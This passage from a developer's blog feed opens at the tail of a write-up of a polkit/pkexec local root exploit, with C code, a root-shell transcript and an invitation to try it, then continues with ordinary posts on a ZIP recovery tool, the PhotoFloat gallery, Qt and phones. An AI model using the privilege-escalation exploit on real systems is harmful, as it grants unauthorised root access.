    Which is suid. Meanwhile in the other process, we launch pkexec, which skirts past the initial checks, but gets fooled when we change the uid of the parent process:

    	} else {
    		sleep(1);
    		printf("[+] Launching pkexec.\n");
    		execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    	}

    And it works:

     $ pkexec --version
     pkexec version 0.101
     $ gcc polkit-pwnage.c -o pwnit
     $ ./pwnit 
     [+] Configuring inotify for proper pid.
     [+] Launching pkexec.
     sh-4.2# whoami
     root
     sh-4.2# id
     uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
     sh-4.2#

    This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which as of writing uses 0.101, has backported 0.102's bug fix. A way to check this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or later and you're out of luck. It's likely other distributions do the same. Fortunately, this exploit is clean enough that you can try it out without too much collateral.

    So head on over and try it out! You can watch it in action over on YouTube as well:

    Greets to Dan.

    Nerdling Sapple: Work Featured in Paris Expo

    My work for Grafitroniks was featured in an expo in Paris last week:

    Viscom 2011

    I built the PrintCompositor.

    Nerdling Sapple: vcardexport for Meego Harmattan

    The vcard export GUI feature of the contacts app on the N950 is broken. The console app “vcardconverter” successfully digests vcards, but getting them back out is another story: in my case, it converted some back to vcards, but failed on others. Unacceptable. For updating to today’s new firmware, I didn’t want to take a full backup of the tracker database, choosing instead to start fresh, suspecting that the new firmware fixes a lot of bugs. How, then, was I to back up my contacts, if I wasn’t going to back up the tracker? Vcard is the perfect neutral format for this.

    So in a few lines of easy Qt/C++, I wrote vcardexport, a console application. It spits all the contacts out into one giant vcard file that can be reimported later with vcardconverter. Simple and easy. The biggest pain was getting the Aegis manifest correct, as the auto-generation tool is broken, and documentation is kind of sparse, but it’s all sorted now.

    You can browse the source here or download the latest deb from here.

    Usage:

    $ /opt/vcardexport/bin/vcardexport > ~/vcards.vcf

    Hope this is helpful. Enjoy the new firmware:

        image        [state    progress         transfer     flash speed]
    ---------------------------------------------------------------------
    [x] cert-sw      [finished   100 %       1 /       1 kB      NA     ]
    [x] cmt-2nd      [finished   100 %      95 /      95 kB      NA     ]
    [x] cmt-algo     [finished   100 %     789 /     789 kB      NA     ]
    [x] cmt-mcusw    [finished   100 %    6008 /    6008 kB    2933 kB/s]
    [x] xloader      [finished   100 %      23 /      23 kB      NA     ]
    [x] secondary    [finished   100 %      88 /      88 kB      NA     ]
    [x] kernel       [finished   100 %    2708 /    2708 kB    2024 kB/s]
    [x] rootfs       [finished   100 %  326205 /  326205 kB    7339 kB/s]
    [x] mmc          [finished   100 %  204747 /  204747 kB   17604 kB/s]
    Updating SW release
    Success
    

    Nerdling Sapple: How many clicks ’til Philosophy?

    Ryan had a pretty funny idea I saw in his GitHub — how many clicks does it take on Wikipedia to get from any given article to the article on “Philosophy”? He started to implement it by choosing the first link on each page and following that. He wrote it in node.js and jsdom. I rewrote his script (97% rewrite, according to git) to instead generate a tree structure of all the links on each page and then do a breadth-first search on the tree, continually requesting new pages in parallel. It seems to be working amazingly well:

    $ node wiki-philosophy.js Seinfeld
    Seinfeld
            Nihilism
                    Philosophy
    
    $ node wiki-philosophy.js Superman
    Superman
            Cultural icon
                    Philosophy
    
    $ node wiki-philosophy.js Burrito
    Burrito
            Mexican cuisine
                    Tribute
                            Philosophy
    

    Play around with it! I’ve posted it with install instructions over in my git repository. Hopefully Ryan will pull back my changes into his repository and continue to develop this into something creative.

    Nerdling Sapple: Google Code Supports Git

    It’s about time!

    Nerdling Sapple: Qt Workshop for Columbia’s Application Development Initiative

    Back in February I gave a workshop seminar on the basics of Qt — covering signals, slots, the metaobject system, QtGui, QtWebkit, and Qt Creator. We all built a fully functional web browser together, over the course of about an hour. The entirety was spoken just off the top of my head, so it might be slightly disorganized, but it was pretty well received. I know that following the presentation, at least two people went on to use Qt for major projects. Here’s the presentation:


    Direct YouTube Link

    Unfortunately, the projector in the room was broken, so we all had to huddle around my laptop, which actually had the effect of making the workshop much more intimate. If you’re interested, here’s the code we wrote together.

    Nerdling Sapple: Wanted: Nokia E52-2

    The Nokia E52 is the most awesome phone ever made. It has a normal T9 keypad, GPS, 3G, Wifi, and runs Symbian. These are the features I need. Sure, Android and the others are more modern operating systems, but no smartphone OS has phones with T9 hardware keypads in this form factor, except for the E52. There is one problem: it’s not made anymore.

    There are two models of the E52 — the E52-1, which has European 3G frequencies, and the E52-2, which has North American 3G frequencies. I’m looking for the E52-2.

    If anyone knows the whereabouts of an E52-2, please inform me. I will bid high.

    Nerdling Sapple: Luddite Seeks Futuristic Phone

    Congratulations to the Necessitas project for joining KDE. I’m not sure what this means as far as KDE’s orientation or how this reflects the latest attitude of, “shit! we spent all this time fussing over Nokia’s mobile hype, and now we realize the desktop is rotting and we need to save it,” but it’s nonetheless exciting to know that Necessitas is supported by a good organization.

    With that said, maybe it’s time for me to find a smartphone. I still use an old Nokia 1100, which doesn’t support much more than calling and SMS. And Snake II. Windows Phone 7 is out. Meego is dead. WebOS is limping. Blackberry has an arcane dev environment. What’s that leave? Junked up Android. As a platform, Android seems to already be experiencing some bloat and disorganization and Java doesn’t seem too hot. But at the very least it runs Qt now.

    The big problem is finding a satisfactory phone. My criteria are fairly simple:

  • QWERTY physical keyboard (I actually would prefer T9, but this is now long past :-( ). This is very important. I will not compromise about this.
  • GSM that runs on AT&T’s 3G network, as well as general GSM support for Europe.
  • Rootable and/or rom-unlockable.
  • Sensible update policy / recent operating system.
  • Big pretty screen.
  • Fast processor.
  • Solid construction.
  • The usual assortment of GPS, Bluetooth, etc do-dads.

    But nothing like this exists. Well, the Xperia Pro looks almost perfect — AT&T 3G (approx), fast processor, pretty screen, great keyboard, etc — except so far it’s only available for pre-order in the UK and it’s looking unlikely it’ll be hitting the US.

    What is out there that meets these criteria? Why does my research continually turn up dry?

    [Sidenote: actually, the perfect phone for me might be the very dated Nokia E52, but I can’t seem to find a North American model anywhere, even on eBay.]

    Nerdling Sapple: Repairing Corrupted ZIP Files by Brute Force Scanning in C

    My brother is a wonderful photographer, and took 14 gigabytes of photos at my recent graduation from Columbia, some of which I hope to post on PhotoFloat — my web 2.0 photo gallery done right via static JSON & dynamic javascript. He was kind enough to upload a ZIP of the RAW (Canon Raw 2 – CR2) photos to my FTP server overnight from his killer 50mbps pipe. The next day, he left for a long period of traveling.

    I downloaded the ZIP archive, eager to start playing with the photographs and learning about RAW photos and playing with tools like dcraw, lensfun, and ufraw, and also seeing if I could forge Canon’s “Original Decision Data” tags. To my dismay, the ZIP file was corrupted. I couldn’t ask my brother to re-upload it or rsync the changes or anything like that because he was traveling and it was already a great burden for him to upload these in the nick of time. I tried zip -F and zip -FF and even a few Windows shareware tools. Nothing worked. So I decided to write my own tool, using nothing more than the official PKZIP spec and man pages.

    First, a bit about how ZIP files are structured — everything here is based on the famous official spec in APPNOTE.TXT. A ZIP file is laid out like this:

        [local file header 1]
        [file data 1]
        [data descriptor 1]
        . 
        .
        .
        [local file header n]
        [file data n]
        [data descriptor n]
        [archive decryption header] 
        [archive extra data record] 
        [central directory]
        [zip64 end of central directory record]
        [zip64 end of central directory locator] 
        [end of central directory record]
    

    Generally, an unzipper seeks to the central directory at the end of the file, which has the locations of all the files in the zip, along with their sizes and names. It reads this in, then seeks back up to the top to read the files off one by one.

    The strange thing about my brother’s broken file was that the beginning files would work and the end files would work, but the middle 11 gigabytes were broken, with Info-ZIP complaining about wrong offsets and lseeks. I figured that some data had been duplicated/reuploaded at random spots in the middle, so the offsets in the zip file’s central directory were broken.

    For each file, however, there is a local file header and an optional data descriptor. Each local file header starts with the same signature (0x04034b50), and contains the file name and the size of the file data that comes after the local file header. But sometimes, the size of the file is not known until the file has already been inserted in the zip file, in which case the local file header reports “0” for the file size and sets bit 3 in a bit flag. This indicates that after the file, of unknown length, there will be a data descriptor that says the file size. But how do we know where the file ends, if we don’t know the length beforehand? Well, usually this data is duplicated in the central directory at the end of the zip file, but I wanted to avoid parsing that altogether. Instead, it turns out that, though not in the original spec, APPNOTE.TXT states, “Although not originally assigned a signature, the value 0x08074b50 has commonly been adopted as a signature value for the data descriptor record. Implementers should be aware that ZIP files may be encountered with or without this signature marking data descriptors and should account for either case when reading ZIP files to ensure compatibility. When writing ZIP files, it is recommended to include the signature value marking the data descriptor record.” Bingo.

    So the recovery algorithm works like this:

    • Look for a local file header signature integer, reading 4 bytes, and rewinding 3 each time it fails.
    • Once found, see if the size is there. If the size is in it, read the data to the file path.
    • If the size isn’t there, search for the data descriptor signature, reading 4 bytes, and rewinding 3 each time it fails.
    • When found, rewind to the start of the data segment and read the number of bytes specified in the data descriptor.
    • Rewind to 4 bytes after the local file header signature and repeat the process.
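
    Here’s a minimal sketch of that scan: a packed local file header struct and a byte-by-byte signature hunt (not the actual recovery tool; the data descriptor path and error handling are omitted):

    // Matches the 30-byte local file header from APPNOTE.TXT; packed, so
    // gcc doesn't pad the fields.
    #include <stdio.h>
    #include <stdint.h>

    struct __attribute__((packed)) local_file_header {
    	uint32_t signature; /* 0x04034b50 */
    	uint16_t version, flags, compression;
    	uint16_t mod_time, mod_date;
    	uint32_t crc32, compressed_size, uncompressed_size;
    	uint16_t name_length, extra_length;
    	/* followed by: file name, extra field, file data */
    };

    int main(int argc, char *argv[])
    {
    	FILE *zip = fopen(argv[1], "rb");
    	uint32_t window = 0;
    	int c;
    	while ((c = fgetc(zip)) != EOF) {
    		// Slide a 4-byte little-endian window over the stream.
    		window = (window >> 8) | ((uint32_t)c << 24);
    		if (window != 0x04034b50)
    			continue;
    		struct local_file_header header = { window };
    		fread((char *)&header + 4, sizeof(header) - 4, 1, zip);
    		printf("header at %ld, %u byte(s) of data\n",
    		       ftell(zip) - (long)sizeof(header), header.compressed_size);
    		/* ...read name_length bytes of name, then the file data, or
    		   hunt for the 0x08074b50 data descriptor when flags bit 3 is set */
    	}
    	fclose(zip);
    	return 0;
    }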

    The files may optionally be deflated, so I use zlib inline to inflate; the advantage is that zlib has its own verification built in, so I don’t need to use the zip’s crc32 (though I should).

    Along the way there is some additional tricky logic for making sure we’re always searching with maximum breadth.

    The end result of all this was… 100% recovery of the files in the archive, complete with their full file names. Win.

    You can check out the code here. Suggestions are welcome. It’s definitely a quick hack, but it did the job. It took a lot of fiddling to make it work, especially figuring out __attribute__((packed)) to turn off gcc’s power-of-two padding.

    Nerdling Sapple: Search Engine Optimization with AJAX Apps using the AJAX Crawl Specification

    Update: Now instead of using HtmlUnit, which proved to be very slow and memory intensive, I’ve written my own ServerExecute app based on QtWebKit. Check it out here.

    PhotoFloat follows the design of using a static html page with a static javascript app that creates dynamic layouts from static json files on the server. This means that googlebot has nothing to index, since it doesn’t run javascript. Uh oh!

    But not quite. A comment in my blog post pointed me toward Google’s AJAX Crawl specification, which is incredible. Basically, sites that use URLs like http://photos.jasondonenfeld.com/#!/columbia_winter_senior/img_1712.jpg with the #! in there (as Twitter does, for example) get rewritten by googlebot to http://photos.jasondonenfeld.com/?_escaped_fragment_=columbia_winter_senior/img_1712.jpg. Then, on the server, using a combination of mod_rewrite, a lil php script as a loader, and a tiny Java app I wrote around HtmlUnit (Google says HtmlUnit is the industry standard), the server sends back static HTML as if a browser had already run all the JavaScript and executed its requests.

    Aside from SEO, it means that Facebook’s crawler can get the proper title and the thumbnails:

    The web evidently is moving away from server-generated HTML and onto JavaScript interfaces, and this is a way to keep SEO working.

    Source:

  • Java app
  • PHP loader
  • .htaccess lines:
    RewriteCond %{QUERY_STRING} _escaped_fragment_=
    RewriteRule . staticrender.php [L]

    Hope this is useful.

    Nerdling Sapple: PhotoFloat — A Web 2.0 Photo Gallery Done Right via Static JSON & Dynamic Javascript

    UPDATE: Because of the wonderful reception across the internet, I’ve put together an instruction page on how to get this set up on your own server.

    I don’t really like database-driven photo management software, and prefer instead to manage my photos in a good old no-nonsense directory structure. For this reason, I was particularly attracted to Zenphoto as a means of getting my photos online, as it works on directory structures. Unfortunately, Zenphoto is horrible; it’s riddled with bugs, inconsistent, and saddled with a cluttered architecture, and most of all, it’s extremely slow. Every time it runs, it re-scans directories and makes a bazillion SQL calls. The viewer interface is also outdated and clunky, having a different html page for each photo. So I went back to the drawing board and considered how to make things better.

    Introducing PhotoFloat. The idea is this — instead of scanning and caching metadata and thumbnails at page load time, everything is done ahead of time. It’s a bit of an old school mentality. There is a script that generates static json files of metadata and album structures and static thumbnails of images, so that all the content can be served directly by Apache. Why? Because I only need to generate new thumbnails and data files when I upload new images (or alternatively, on a cron job). So that’s what I did; I wrote a simple python script that walks a directory structure looking for new or changed images and albums. It’s smart too — to be super zippy, it does file modification time comparisons. It also cleans up after itself, deleting stale files.
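
    The scanner itself is Python, but the mtime trick is simple. Here’s a C++17 sketch of the idea (invented names; the real script’s layout differs):

    // Sketch: regenerate a thumbnail only when the source photo is newer
    // than the cached one, mirroring the scanner's mtime comparison.
    #include <filesystem>
    #include <iostream>

    namespace fs = std::filesystem;

    // Stand-in for the real resize-and-save step.
    static void make_thumbnail(const fs::path &photo, const fs::path &thumb)
    {
    	fs::copy_file(photo, thumb, fs::copy_options::overwrite_existing);
    }

    int main(int argc, char *argv[])
    {
    	fs::path albums = argv[1], cache = argv[2];
    	for (const auto &entry : fs::recursive_directory_iterator(albums)) {
    		if (!entry.is_regular_file())
    			continue;
    		fs::path thumb = cache / fs::relative(entry.path(), albums);
    		// The zippy bit: skip anything whose thumbnail is up to date.
    		if (fs::exists(thumb) &&
    		    fs::last_write_time(thumb) >= fs::last_write_time(entry.path()))
    			continue;
    		fs::create_directories(thumb.parent_path());
    		make_thumbnail(entry.path(), thumb);
    		std::cout << "updated " << thumb << '\n';
    	}
    	return 0;
    }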

    So I have all my original images on my webserver, because I have Dreamhost’s unlimited hosting. I also have another directory that I populate with symlinks to the directories I actually want online. Every time there are new images, my python script fires up, and updated json data files and thumbnail files are generated.

    Great, but where does this leave us? What can we do with json files? This is where things become wonderful. Since all the data for the gallery is AJAX-fetchable, a single html page and a single javascript file take care of the whole gallery. That’s right — all of the display of views is done client side, and in one page load.

    To keep track of pages and for swapping around links, each different album and different image has its own hash url, like, for example: #!/new_hampshire_in_snow_3.15.11-3.17.11/img_1919.jpg. It’s all lower case with naughty characters stripped out to keep up with the patterns of wordpress and other web apps. These function as permalinks.

    The albums have extensive support for EXIF metadata, which can be loaded by clicking ‘show metadata’, and a transparent box slides up over the photo. There’s also the ability to download the original photos.

    Each album gets a randomized thumbnail which assigns probabilities to each image in the album based on the number of images in each album and the depth of subalbums. The randomization algorithm is all done at client side.

    Images are preloaded. Album data is prefetched. Everything is cached sanely. JSON files are gzipped. There are animations between views and smooth scrolling. The right and left arrow keys work. Clicking on the photo advances it, like on Facebook. Finally, I do include one dynamic script — a simple php script that takes old Zenphoto URLs and translates them into the new ones, so that people with old links can still access the same photos.

    Essentially, there are a lot of little details that had to be done right, and to my knowledge, no web gallery that works on directory structures has done it well, making an ajaxy and speedy gallery. So now you have PhotoFloat. I’ve just finished writing it, and the code is a bit of a mess, but let me know if you have any suggestions or find any bugs.

    You can browse the code in the git repository or try it out live on my photo site. If you make any modifications of my code or use it on your own site, please inform me and send any modifications back to me. Remember to run make on the web directory to minify the css and javascript, and also, be sure to change the google analytics tracking ID in web/js/999-googletracker.js.

    Comments? Suggestions?

    Update 2 for KDEers: It looks like some people from kipi-plugins and kphotoalbum are interested in building integration for this in.

    Update 3: Following a suggestion in the comments below, URLs now use #!, which google translates to a special query string, and I’ve written a serverside component that executes the JavaScript and displays static content for googlebot. This allows the metadata to be crawled.

    Nerdling Sapple: KDE Alive with KWin Menu Excitement

    Martin’s post set off an eruption of ideas and debates over integrating dbusmenu and kwin and proposals for a new tabbed API. To quote José Pedro‘s comment:

    The most important things I see lacking in Kwin from KDE 4.5 are an API to allow windows to open in a specific existing group (make a new tab in the decoration), and that the windows from a specific group are not grouped in the taskbar. I also think that if these 2 problems are fixed, most apps in KDE could use the decoration tabs instead of relying on the currently used tabs, inside the application itself. The important thing to notice here is the natural mix between the application tabs and the menu button. These complete each other, and all apps in KDE which rely on tabs to show documents would ideally use this system (dolphin, rekonq, kate, kword… just to name a few).

    Here are some screen shots proposed in the comment thread:



    Having an easy API to enable this would be very welcome.
    setMainMenu(menu);
    setWindowTabs(tabWidget);

    Elsewhere in KWin settings:

    [ X ] Place tabs in window border when supported.
    [   ] Place main menu in window border when supported.

    Nerdling Sapple: Strap on your Tin Foil Hats, Kids: Google Maps Uses Different Data for Korean Sea Areas

    Frittering away time, I absent-mindedly loaded up the Google Maps API Javascript File and, hazy-eyed, noticed some references to http://mt0.gmaptiles.co.kr. Co.kr? Korea? Why are there references to a Korean tile server in the global api file?

    So digging deeper, I supposed that the numbers surrounding the urls were coordinates on the globe. A simple sloppy bash one-liner later, and we have the following:

    $ curl -s http://maps.google.com/maps/api/js?sensor=false|tr ',' '\n'|grep -E '([0-9]+\]+|\[+[0-9]+)'|tr -d ']['|head -n -2|tail -n +2|while read lat; do read long; echo "$(echo "scale=8;$lat / 10000000"|bc),$(echo "scale=8; $long / 10000000"|bc)"; done | sort | uniq

    32.98908400,124.60556000
    33.00000000,124.60500000
    34.46467400,128.49609400
    34.50000000,127.96000000
    34.89000000,128.67000000
    35.02774700,128.84765600
    35.46900000,129.36000000
    36.65000000,129.70000000
    37.02777300,131.05316200
    38.62000000,127.96000000
    38.62000000,128.67000000
    38.62000000,129.36000000
    38.62000000,132.00347900
    38.69301300,128.49609400
    38.69301300,128.84765600
    38.69301300,131.05316200
    38.69301300,132.00347900

    Open these in tabs. We see strange locations in the seas surrounding Korea, including a few locations on land.


    Why?

    Update: Mystery Solved! A commenter writes, “This is due to Korean law prohibiting exporting detailed maps outside of Korea. That’s why Google (and other companies like Yahoo) set up separate server in Korea for detailed Korean map tiles. Areas linked in this post are supposed to be Korean water and land frontiers. This is actually a legacy of cold war era.”

    Nerdling Sapple: Nokia Admits to not Focusing on Desktop Qt

    In a comment from a Qt Nokia engineer:

    Qt on the desktop is currently not a priority for our R&D team, even though Nokia does use Qt for desktop applications (and not only Qt Creator). That doesn’t mean that nobody is working on it, however we do believe that Qt is a great development tool for desktop applications, even if we just maintain it and keep it working on the desktop platforms. We definitely want to keep it that way, and we continue to improve and modernize Qt on the desktop as well, but I personally don’t really see that there are a lot of new features we could add to make Qt significantly more powerful for desktop development (esp features that are already provided by other libraries – why cannibalize our own community?).

    Perhaps obvious and expected, but are we okay with this admission?